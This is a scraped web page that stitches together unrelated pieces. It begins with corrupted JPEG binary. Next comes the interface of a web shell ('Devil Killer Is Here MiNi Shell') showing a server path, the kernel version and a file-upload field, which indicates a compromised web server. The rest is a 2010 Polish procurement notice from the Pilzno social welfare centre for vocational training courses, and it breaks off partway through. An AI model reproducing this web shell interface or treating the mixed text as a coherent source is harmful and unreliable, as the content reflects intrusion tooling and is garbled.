JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100415/106394-N-2010.html

<p class="kh_header"><b>Pilzno: PRZEPROWADZENIE KURSÓW ZAWODOWYCH DLA UCZESTNIKÓW PROJEKTU REALIZOWANEGO PRZEZ OŚRODEK POMOCY SPOŁECZNEJ W PILŹNIE PT.:CZAS NA AKTYWNOŚĆ W GMINIE PILZNO, ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VII PROMOCJA INTEGRACJI SPOŁECZNEJ, DZIAŁANIE 7.1 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI, PODDZIAŁANIE 7.1.1 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI PRZEZ OŚRODKI POMOCY SPOŁECZNEJ.</b><br>
<b>Numer ogłoszenia: 106394 - 2010; data zamieszczenia: 15.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Pilźnie , ul. Rynek 33, 39-220 Pilzno, woj. podkarpackie, tel. 14 6807729, faks 14 6807747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.pilzno.kw.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE KURSÓW ZAWODOWYCH DLA UCZESTNIKÓW PROJEKTU REALIZOWANEGO PRZEZ OŚRODEK POMOCY SPOŁECZNEJ W PILŹNIE PT.:CZAS NA AKTYWNOŚĆ W GMINIE PILZNO, ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VII PROMOCJA INTEGRACJI SPOŁECZNEJ, DZIAŁANIE 7.1 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI, PODDZIAŁANIE 7.1.1 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI PRZEZ OŚRODKI POMOCY SPOŁECZNEJ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie kursów zawodowych dla uczestników projektu realizowanego przez Ośrodek Pomocy Społecznej w Pilźnie pt.: Czas na aktywność w gminie Pilzno, ze środków Europejskiego Funduszu Społecznego w ramach programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i Upowszechnianie Aktywnej Integracji, Poddziałanie 7.1.1 Rozwój i Upowszechnianie Aktywnej Integracji przez Ośrodki Pomocy Społecznej.
2. Kursy są skierowane do osób zameldowanych w Gminie Pilzno, bezrobotnych, nieaktywnych zawodowo oraz osób zatrudnionych i korzystających ze świadczeń pomocy społecznej.
3. Poszczególne kursy Wykonawca będzie realizował wyłącznie w dni robocze.
4. Wykonawca, będzie przeprowadzał kurs wyłącznie w wymiarze max. 6 godzin dziennie.
5. Poszczególne kursy Wykonawca realizuje zgodnie z ustalonym i zatwierdzonym przez Zamawiającego programem kursu. 
6. Wykonawca zobowiązuje się do prowadzenia ewidencji obecności uczestników kursu. 
7. Wykonawca zobowiązuje się do uzyskania od uczestników potwierdzenia otrzymania materiałów szkoleniowych. 
8. Wykonawca zobowiązany jest wydać po ukończeniu kursu uczestnikom (1 egz.) i Zamawiającemu (1 egz.) zaświadczenia, świadectwa lub certyfikat zgodny z obowiązującymi przepisami prawa. Dokument musi zawierać min. szczegółowy wykaz przedmiotów i godzin trwania kursu. 
9. Wykonawca zobowiązany jest uzyskać potwierdzenie od uczestników poszczególnego kursu otrzymania zaświadczenia o ukończeniu kursu. 
10. Wykonawca zobowiązany jest do umieszczenia informacji o realizowanym kursie na stronie internetowej www.inwestycjewkadry.info.pl. 
11. Wykonawca zobowiązany jest do oznaczenia pomieszczeń, w których odbywa się kurs, materiałami szkoleniowymi oraz wszelkimi innymi dokumentami, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Zamówienie obejmuje 5 części, zgodnie ze SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna oświadczenie złożone przez Wykonawcę, że posiada uprawnienia do wykonywania wymaganej przez Zamawiającego działalności.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączony do oferty:
a) wykaz wykonanych lub wykonywanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie tj. realizacji co najmniej trzech kursów, w tym jeden ze środków dofinansowanych przez Europejski Fundusz Społeczny, o wartości co najmniej 10 000zł brutto każdy, polegających na przygotowaniu i przeprowadzeniu kursu w zakresie przedmiotu zamówienia tej części, do której przystępuje Wykonawca, określonej w Rozdziale IV ust. 4 pkt. 1-5, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz złożeniem dokumentów (np.: rekomendacji) potwierdzających, że zostały wykonane lub wykonywane należycie,
b) oświadczenie złożone przez Wykonawcę, że posiada niezbędną wiedzę i doświadczenie w realizacji kursu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączony do oferty: 
a) wykaz osób, które będą uczestniczyły w wykonaniu zamówienia,
b) oświadczenie Wykonawcy, iż osoby, które będą uczestniczyły                          w wykonaniu zamówienia posiadają wymagane prawem uprawnienia do realizacji kursu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączony do oferty: 
a) wykaz osób, które będą uczestniczyły w wykonaniu zamówienia,
b) oświadczenie Wykonawcy, iż osoby, które będą uczestniczyły                          w wykonaniu zamówienia posiadają wymagane prawem uprawnienia do realizacji kursu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączone do oferty oświadczenie Wykonawcy, iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">dokumenty potwierdzające, że usługi są należycie wykonane lub wykonywane.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.pilzno.kw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej
ul. Rynek 33
39 - 220  Pilzno
pokój  01 POMOC SPOLECZNA - na parterze..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2010 godzina 08:15, miejsce: Ośrodek Pomocy Społecznej
ul. Rynek 33
39 - 220  Pilzno
pokój  01 POMOC SPOLECZNA - na parterze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie publiczne realizowane przez Ośrodek Pomocy Społecznej w Pilźnie pt.: Czas na aktywność w gminie Pilzno, współfinansowane jest ze środków Europejskiego Funduszu Społecznego w ramach programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i Upowszechnianie Aktywnej Integracji, Poddziałanie 7.1.1 Rozwój i Upowszechnianie Aktywnej Integracji przez Ośrodki Pomocy Społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1)CZĘŚĆ I: OPERATOR KOPARKO - ŁADOWARKI:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs będzie kierowany do uczestników rekrutowanych przez Zamawiającego (od 6 do 7 osób), termin realizacji: od VI do VII 2010 roku. Miejscem realizacji kursu: miasto Pilzno lub miejsce oddalone od siedziby Zamawiającego max. 30 km. 

Wymagana liczba godzin (1 godz. = 60 min.): zajęć teoretycznych minimum 115 i praktycznych minimum 60, na odpowiednim do specyfiki kursu sprzęcie tj. koparko - ładowarkach. 
Program kursu ma być zgodny z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 roku w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118 poz. 1263) oraz zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego. 
Celem kursu jest teoretyczne i praktyczne przygotowanie uczestników do egzaminów końcowych według wymaganych przepisów prawa.

Wykonawca w cenie kursu zapewnia: badania profilaktyczne uczestników zgodnie z wymaganiami do specyfiki danego kursu, ubezpieczenie uczestników od NW na czas trwania kursu, organizacja i przebieg kursu, wynagrodzenia wykładowców lub instruktorów, przygotowanie do egzaminu końcowego, opłata za przeprowadzenie egzaminu, niezbędne materiały szkoleniowe, odzież i obuwie ochronne, które zawiera w widocznym miejscu logo Europejskiego Funduszu Społecznego, 1 gorący, jednodaniowy posiłek (drugie danie) w każdym dniu kursu oraz w dniu egzaminu, stały dostęp dla uczestników do wody mineralnej, kawy i herbaty, wynajem sal i warsztatów, zajęcia odbywają się w salach i warsztatach wskazanych przez Wykonawcę, wydanie zaświadczenia o ukończeniu kursu, które musi zawierać min. szczegółowy wykaz przedmiotów i godzin trwania kursu, Książeczkę Operatora (wydana przez IMBiGS), Świadectwo Egzaminu (wydane przez IMBiGS: w języku polskim i innym języku do wyboru przez uczestnika kursu)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II: OBSŁUGA KASY FISKALNEJ Z GOSPODARKĄ MAGAZYNOWĄ:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs będzie kierowany do uczestników rekrutowanych przez Zamawiającego (od 13 do 15 osób) w dwóch grupach po około 7 osób, termin realizacji: pierwsza grupa od VI do VII, druga grupa od IX do X 2010 roku. Miejscem realizacji kursu: miasto Pilzno lub miejsce oddalone od siedziby Zamawiającego max. 15 km. 

Wymagana liczba godzin (1 godz. = 60 min.): zajęć teoretycznych minimum 45 i praktycznych minimum 55, na odpowiednich stanowiskach związanych ze specyfiką kursu. 
Celem kursu jest teoretyczne i praktyczne przygotowanie uczestników do pracy na stanowisku komputerowym wyposażonym w program do obsługi magazynu oraz kasę fiskalną współpracującą z komputerem.

Wykonawca w cenie kursu zapewnia: ubezpieczenie uczestników od NW na czas trwania kursu, organizację i przebieg kursu, przygotowanie i zorganizowanie egzaminu końcowego, wynagrodzenie wykładowców lub instruktorów, niezbędne materiały szkoleniowe, 1 gorący posiłek (drugie danie) w każdym dniu kursu, stały dostęp dla uczestników do wody mineralnej, kawy i herbaty, wynajem sal,  zajęcia odbywają się w salach wskazanych przez Wykonawcę, przeprowadzenie egzaminu końcowego, wydanie zaświadczenia zgodnego z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III: SPAWANIE BLACH I RUR SPOINAMI PACHWINOWYMI W METODACH: TIG (141), MAG (135), MIG (131):.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs będzie kierowany do uczestników rekrutowanych przez Zamawiającego (od 5 do 6 osób), termin realizacji: od VII do VIII 2010 roku. Miejscem realizacji kursu: miasto Pilzno lub miejsce oddalone od siedziby Zamawiającego max. 15 km. 

Liczba godzin (1 godz. = 60 min.): zajęć teoretycznych minimum 65 i praktycznych minimum 135, na odpowiednich stanowiskach spawalniczych. 
Program kursu ma być zgodny z Wytycznymi Instytutu Spawalnictwa w Gliwicach. 
Celem kursu jest teoretyczne i praktyczne przygotowanie uczestników do egzaminów końcowych zgodnie z obowiązującymi przepisami prawa.

Wykonawca w cenie kursu zapewnia: ubezpieczenie uczestników od NW na czas trwania kursu, organizację i przebieg kursu, przygotowanie do egzaminu końcowego, opłata za przeprowadzenie egzaminu przez Instytut Spawalnictwa w Gliwicach, niezbędne materiały szkoleniowe, wynagrodzenia wykładowców lub instruktorów, odzież i obuwie ochronne, które zawiera logo Europejskiego Funduszu Społecznego w widocznym miejscu, 1 gorący, jednodaniowy posiłek (drugie danie) w każdym dniu szkolenia oraz w dniu egzaminu, stały dostęp dla uczestników do wody mineralnej, kawy i herbaty, wynajem sal i warsztatów, zajęcia odbywają się w salach i warsztatach wskazanych przez Wykonawcę, wydanie zaświadczenia o ukończeniu kursu, Książeczkę Spawacza (IS), Świadectwo Egzaminu Spawacza (IS: w języku polskim i innym języku do wyboru przez uczestnika kursu)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV: FLORYSTYKA:.</p>
